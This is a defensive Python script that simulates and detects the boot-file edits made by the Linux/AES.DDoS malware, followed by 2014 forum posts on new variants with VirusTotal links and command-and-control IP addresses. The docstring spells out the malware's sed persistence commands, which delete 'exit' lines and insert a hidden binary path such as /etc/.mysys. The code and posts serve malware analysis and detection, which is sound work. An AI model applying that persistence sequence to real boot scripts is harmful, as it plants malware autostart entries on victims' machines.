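"""Audit rc.local-style boot scripts for Linux/AES.DDoS autostart entries.

Added example, not code from the original posts. simulate_install() mirrors
the posted sed one-liners; audit_boot_script() checks a file for the traces
they leave. The clean rc.local text below is constructed.
"""
import re

# Files the posted sed commands target.
AUTOSTART_FILES = ("/etc/rc.local", "/etc/rc.d/rc.local", "/etc/init.d/boot.local")


def simulate_install(text, install_dir, name, delete_exit=False, start=False):
    """Apply the sed sequence to an in-memory copy of the script.

    sed -i -e '/exit/d'         delete every line containing 'exit'
                                (MIPS/ARM variants only, hence delete_exit)
    sed -i -e '/%s/d'           delete lines already naming the binary
    sed -i -e '2 i%s/%s'        insert '<dir>/<name>' before line 2
    sed -i -e '2 i%s/%s start'  same, with ' start' (rc.d/rc.local, boot.local)

    GNU sed's '2 i' does nothing on a file with fewer than two lines, so a
    script reduced to its shebang by the '/exit/d' step gets no entry at all.
    """
    lines = text.splitlines()
    if delete_exit:
        lines = [l for l in lines if "exit" not in l]
    lines = [l for l in lines if name not in l]
    entry = f"{install_dir}/{name}" + (" start" if start else "")
    if len(lines) >= 2:
        lines.insert(1, entry)
    return "\n".join(lines) + "\n"


_BARE_PATH = re.compile(r"^(/[^\s]+)(\s+start)?\s*$")   # "/dir/name" or "/dir/name start"
_HIDDEN = re.compile(r"/\.[^/\s]+")                       # e.g. /etc/.mysys


def audit_boot_script(text):
    """Return findings for one boot script's content (empty list = nothing seen)."""
    lines = text.splitlines()
    findings = []
    if len(lines) >= 2 and _BARE_PATH.match(lines[1]):
        findings.append(f"line 2 runs a bare path: {lines[1].strip()}")
    if not any("exit" in l for l in lines):
        findings.append("no exit line (the '/exit/d' edit removes it)")
    for n, l in enumerate(lines, 1):
        if not l.lstrip().startswith("#") and _HIDDEN.search(l):
            findings.append(f"line {n} references a hidden path: {l.strip()}")
    return findings


def audit_all(contents):
    """contents: {path: text} for whichever AUTOSTART_FILES exist on the host."""
    return {path: audit_boot_script(text) for path, text in contents.items()}


CLEAN_RC_LOCAL = "#!/bin/sh -e\n# rc.local: commands run at the end of multiuser boot\nexit 0\n"

if __name__ == "__main__":
    infected = simulate_install(CLEAN_RC_LOCAL, "/etc", ".mysys", delete_exit=True)
    print(infected)
    for finding in audit_boot_script(infected):
        print("!", finding)
```

Two practical points fall out of the simulation: the install is idempotent (the '/%s/d' step removes the previous entry before re-inserting it), so re-infection leaves a single line, and an rc.local that only consists of a shebang and "exit 0" ends up with no entry at all on the MIPS/ARM variants, because the exit line is deleted first and '2 i' then has no line 2 to insert before.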

Re: Linux/AES.DDoS

Postby unixfreaxjp » Tue Sep 23, 2014 10:22 pm

The China crook was releasing an ARM binary: https://www.virustotal.com/en/file/4ccd ... 411510591/ < FUD, packed
This time they fake this Windows service :D
Code:
 WinHelp32.exe   
 WinHelp32   
 Windows Help System   
 Windows Help System for X32 windows desktop

CNC is at 183.60.205.183

Re: Linux/AES.DDoS (no AES, atk: only DNS Amp)

Postby unixfreaxjp » Sun Oct 05, 2014 9:22 am

New panel with a variant of AES.DDoS found:
Image
Code:
dos64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
This is a lightweight build, no HTTP flood, and they didn't use AES at all, but the "usual" signs in the coding show this variant; moreover the AES series was found in the same panel sources too.. gotta post them one by one..
https://www.virustotal.com/en/file/418f ... 412500424/
Code:
CNC: 222.186.34.152:8998 (ip base)
ASN: 23650 | 222.186.34.0/23 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK

thx @wirehack
Last edited by unixfreaxjp on Sun Oct 05, 2014 11:29 am, edited 1 time in total.
